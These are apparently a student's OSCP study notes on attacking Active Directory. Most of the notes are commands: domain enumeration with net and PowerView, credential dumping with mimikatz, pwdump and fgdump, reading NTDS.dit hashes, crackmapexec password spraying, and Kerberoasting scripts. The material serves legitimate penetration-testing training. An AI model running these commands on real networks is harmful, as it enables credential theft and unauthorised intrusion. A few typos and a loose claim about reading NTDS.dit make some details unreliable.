OSCP Notes


Users / Groups / Computers
  • Look for users with high-privs across the domain e.g. Domain Admins or Derivative Local Admins
  • Look for custom groups.
# get all users in the domain # are there any weird domains?
cmd> net user /domain
cmd> net user [username] /domain
# get all groups in the domain
cmd> net group /domain
cmd> net group [groupname] /domain
# get all computers in domain
cmd> net view
cmd> net view /domain
# get resources/shares of specified computer
cmd> net view \\[computer_name] /domain
If you can't get all the domain members info, you might want to check the priv (whoami /priv)
Check the UAC is enabled (if you're not able to execute executables that you uploaded like mimikatz)

Plaintext? (low hanging fruit) > Passwordspray?

  • WinPeas may reveal plaintext pass.
Dumping creds if it's not launghed from a SYSTEM, we need to run
token::elevate after privilege::debuf
# dump NTLM hashes + plaintext creds
mimikatz > lsadump::sam # dump contents of SAM db in current host
mimikatz > sekurlsa::logonpasswords # dump creds of logged-on users
Other tools
cmd> pwdump.exe localhost
cmd> fgdump.exe localhost # improved pwdump, shutdown firewalls
cmd> type C:\Windows\NTDS\NTDS.dit # all domain hashes in NTDS.dit file on the Domain Controller
Are there any pattens in users passwords? Can we make a password list and do a password spray?
crackmapexec smb IP -u user.txt -p pass.txt --continue-on-success
Then try RDP
rdesktop -r disk:tmp=/home/kali/transfer -u domain_name\\user_name -p Password IP_+addr
  • by setting a disk argument, we can see and transfer all the files from the directory as a share. It's super useful.


Service Principal Names (AD Service Accounts)
  • A SPN is a unique name for a service on a host, used to associate with an Active Directory service account.
  • Enum SPNs to obtain the IP address and port number of apps running on servers integrated with Active Directory.
  • Query the Domain Controller in search of SPNs.
  • SPN Examples
    • CIFS/MYCOMPUTER$ - file share access.
    • LDAP/MYCOMPUTER$ - querying AD info via. LDAP.
    • HTTP/MYCOMPUTER$ - Web services such as IIS.
  • Perform nslookup of the service hostname -> see if there is an entrypoint here.
  • Automated SPN enum scripts:
# Kerberoast: https://github.com/nidem/kerberoast/blob/master/GetUserSPNs.ps1
PS> .\GetUserSPNs.ps1
# Powershell Empire: https://github.com/compwiz32/PowerShell/blob/master/Get-SPN.ps1
PS> .\Get-SPN.ps1
Logged-in users and active user sessions.
PS> Set-ExecutionPolicy Unrestricted
PS> Import-Module .\PowerView.ps1
PS> Get-NetLoggedon -ComputerName [computer_name] # enum logged-in users
PS> Get-NetSession -ComputerName [domain_controller] # enum active user sessions

Domain Controller hostname (PdcRoleOwner)**
PS> [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()